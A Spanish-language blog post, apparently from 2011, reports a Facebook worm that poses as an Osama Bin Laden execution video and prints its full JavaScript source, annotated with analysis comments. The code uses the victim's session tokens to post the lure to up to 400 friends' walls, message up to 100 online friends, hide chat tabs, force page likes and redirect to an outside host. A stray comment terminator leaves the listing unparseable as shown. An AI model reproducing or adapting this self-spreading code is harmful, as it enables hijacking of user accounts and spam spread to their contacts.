
Un gusano llamado Osama Bin Laden infecta Facebook

 



Era evidente que con la muerte de Osama Bin Laden iban a aparecer aplicaciones maliciosas para atrapar a los usuarios más desprevenidos, por no decirles de otra forma. En este caso, un código hecho en JavaScript se apodera de tu cuenta de Facebook y se disfraza como si fuera el video de su muerte. Actualmente existen tres variantes de este código, pero se cree que van a salir muchas más, por lo menos hasta que Facebook bloquee esta nueva forma de intrusión. Mirá el código fuente del gusano.

Código fuente del gusano

///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KuNG FU JS v.1  20yrsplus.info
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');
// Return the value of the cookie called `name`, or null when none matches.
// It reads document.cookie, so it can only see cookies that the browser
// exposes to script in the page where this code is running.
//   name    - cookie name to look up
//   returns - the text after "name=" in the first matching pair, else null
function readCookie(name) {
	var nameEQ = name + "=";
	// document.cookie is one "k=v; k=v" string; split it into pairs.
	var ca = document.cookie.split(';');
	for(var i=0;i < ca.length;i++) {
		var c = ca[i];
		// Drop the spaces that follow each ';' separator.
		while (c.charAt(0)==' ') c = c.substring(1,c.length);
		// Match only at position 0 so that "xname=" does not match "name=".
		if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
	}
	return null;
}
// ANALYSIS NOTE: everything from here on runs with the logged-in user's own
// session. The listing does not show how the script gets into the page.
// Numeric id of the logged-in account, taken from the "c_user" cookie.
var user_id = readCookie("c_user");
// Setup some variables
// Both values are read from form fields already present in the page, and each
// POST further down sends them back. Presumably these are the site's
// per-session request tokens (TODO confirm): such tokens stop forged requests
// coming from other sites, but not script already executing inside the page.
// If either field is missing, [0] is undefined and the script stops here.
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
// Chat message variables
// All four entries are the same URL, so the random pick below always yields
// the same lure link.
var linkies = [
	"http://www.facebook.com/Osama.Gets.Shot.Down",
	"http://www.facebook.com/Osama.Gets.Shot.Down",
	"http://www.facebook.com/Osama.Gets.Shot.Down",
	"http://www.facebook.com/Osama.Gets.Shot.Down"
]
// Fixed lure text plus the link; this constant string is what recipients see.
var this_chat = "Watch Osama's EXECUTION Video! " + linkies[Math.floor(Math.random()*linkies.length)];
// URL-encoded once here and reused as msg_text in the chat section.
var prepared_chat = encodeURIComponent(this_chat);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// ANALYSIS NOTE: this section fetches the account's friend list and then
// posts the lure, as a link attachment, to the wall of up to 400 friends.
// The status text, title, description, image URL, favicon host, app_id and
// scrape_time are hard-coded, so every post made by this variant is identical.
// Current time in whole seconds, sent as part of the "token" query parameter.
var token = Math.round(new Date().getTime() / 1000);
var http1 = new XMLHttpRequest();
// Friend lookup for viewer=user_id, restricted to friends_only users.
var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";
var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.
	if(http1.readyState == 4 && http1.status == 200) { // If state = success
		var response1 = http1.responseText;
		// The reply starts with "for (;;);" and is not valid JSON until that
		// prefix is removed. Presumably a guard against cross-site inclusion
		// of the response; it does not hinder same-page script like this.
		response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
		response1 = JSON.parse(response1); // Convert the response to JSON
		//alert(response4.toSource());
		var count = 0;
		// `uid` is never declared, so it becomes a global. The loop only
		// counts the entries; each one is actually fetched by index `count`.
		for(uid in response1.payload.entries){
			// Hard cap: at most 400 wall posts per run.
			if(count < 400){
				//alert("SENT TO "+response1.payload.entries[count].uid);
				// Loop to send messages
				// New XMLHttp object
				var httpwp = new XMLHttpRequest();
				var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
				var statusmessage="Disturbing Yet Awesome!";
				var title="Bin Laden EXECUTION Video! Yes it's REAL!";
				var link=linkies[Math.floor(Math.random()*linkies.length)];
				var description="Commandos attack Bin Laden's compund and take him out!";
				var picture="http://i.imgur.com/yTjtU.jpg";
				// Form body for the post: xhpc_targetid is the friend's uid,
				// and post_form_id / fb_dtsg are the values read from the page.
				var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
				httpwp.open("POST", urlwp, true);
				//Send the proper header information along with the request
				httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
				httpwp.setRequestHeader("Content-length", paramswp.length);
				httpwp.setRequestHeader("Connection", "keep-alive");					
				// The handler holds only commented-out debug alerts, so the
				// outcome of each post is never inspected.
				httpwp.onreadystatechange = function() { //Call a function when the state changes.
					if(httpwp.readyState == 4 && httpwp.status == 200){
						//alert(http.responseText);
						//alert('buddy list fetched');
					}
				}
				httpwp.send(paramswp);
			}
			count++; // increment counter
		}
		// Bare property read with no call: this statement does nothing.
		http1.close; // Close the connection
	}
}
http1.send(null);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// ANALYSIS NOTE: sets display:none on the element with id
// 'fbDockChatTabSlider'. Presumably this keeps the chat tabs out of the
// account owner's view while the chat section runs (TODO confirm against the
// page markup of the time).
// If the element is absent, `hide` is null and the next line throws.
var hide = document.getElementById('fbDockChatTabSlider');
hide.style.display = "none";
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// ANALYSIS NOTE: this section asks for the chat buddy list and sends the
// prepared lure text to up to 100 of the friends listed as available.
// Every message carries the same msg_text (prepared_chat).
var http3 = new XMLHttpRequest();
var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
// Identifies the account (user_id) and sends back the two values read from the page.
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);
//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");
http3.onreadystatechange = function() {//Call a function when the state changes.
	if(http3.readyState == 4 && http3.status == 200) {
		var response3 = http3.responseText;
		// Same "for (;;);" prefix removal as in the friend-list request.
		response3 = response3.replace("for (;;);", "");
	        response3 = JSON.parse(response3);
		var count = 0;
		// `property` is never declared, so it becomes a global. Each key of
		// nowAvailableList is used directly as the recipient in "to=".
		for(property in response3.payload.buddy_list.nowAvailableList){
			// Hard cap: at most 100 chat messages per run.
			if(count < 100){
				// Loop to send messages
				// New XMLHttp object
				var httpc = new XMLHttpRequest();
				// Generate random message ID
				var msgid = Math.floor(Math.random()*1000000);
				// Seconds since the epoch, used for client_time and pvs_time.
				var time = Math.round(new Date().getTime() / 1000);
				var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
				var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
				httpc.open("POST", urlc, true);
				//Send the proper header information along with the request
				httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
				httpc.setRequestHeader("Content-length", paramsc.length);
				httpc.setRequestHeader("Connection", "close");
				// Only commented-out debug alerts inside: the result is ignored.
				httpc.onreadystatechange = function() { //Call a function when the state changes.
					if(httpc.readyState == 4 && httpc.status == 200){
						//alert(http.responseText);
						//alert('buddy list fetched');
					}
				}
				httpc.send(paramsc);
			}
			//alert(property);
			count++; // increment counter
		}
		// Bare property read with no call: this statement does nothing.
		http3.close; // Close the connection
	}
}
http3.send(params3);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// ANALYSIS NOTE: posts to fan_status.php with add=1 for the hard-coded
// fbpage_id, i.e. it makes the logged-in account a fan of that page without
// any action by the user. The page id is constant in this listing.
var http4 = new XMLHttpRequest();
var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
// Sends back the two values read from the page along with the page id.
var params4 = "fbpage_id=217981564879947&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
http4.open("POST", url4, true);
//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");
http4.onreadystatechange = function() {//Call a function when the state changes.
	if(http4.readyState == 4 && http4.status == 200) {
		// Bare property read with no call: the response is not used at all.
		http4.close; // Close the connection
	}
}
http4.send(params4);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// ANALYSIS NOTE: byte-for-byte the same request as the previous "Become a
// Fan" section (same endpoint, same fbpage_id, same parameters); only the
// variable names differ. The section title suggests a second page was meant,
// but the listing does not show one.
var http5 = new XMLHttpRequest();
var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var params5 = "fbpage_id=217981564879947&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
http5.open("POST", url5, true);
//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");
http5.onreadystatechange = function() {//Call a function when the state changes.
	if(http5.readyState == 4 && http5.status == 200) {
		// Bare property read with no call: the response is not used at all.
		http5.close; // Close the connection
	}
}
http5.send(params5);
*/
// NOTE(review): the block-comment terminator on the line above has no
// matching opener anywhere in this listing, so the text as reproduced here
// does not parse. Presumably the opener was lost when the sample was pasted
// and part of the preceding code was commented out in the original; which
// part cannot be told from this page.
//document.getElementById('susta').style.display="none";
// Replaces the page's main content with a waiting message.
document.getElementById('contentArea').innerHTML="Please wait...";
// After 15000 ms the browser is sent to an external host. The first argument
// is a string, which setTimeout evaluates as code.
setTimeout("window.location = 'http://osama.mytopanswers.info/video.htm';", 15000);

Para más información: PasteBin

Créditos a quien corresponda. Usar solamente a modo de aprendizaje.

Fuente propia

 

1 Comentario

 

  1. Javier 7 mayo, 2011  15:56 Responder

    Es increíble cómo se las ingenian para hackear Facebook, y eso que es un entorno super probado. Igual, como dice la nota, la gente ayuda a que estas cosas se propaguen...
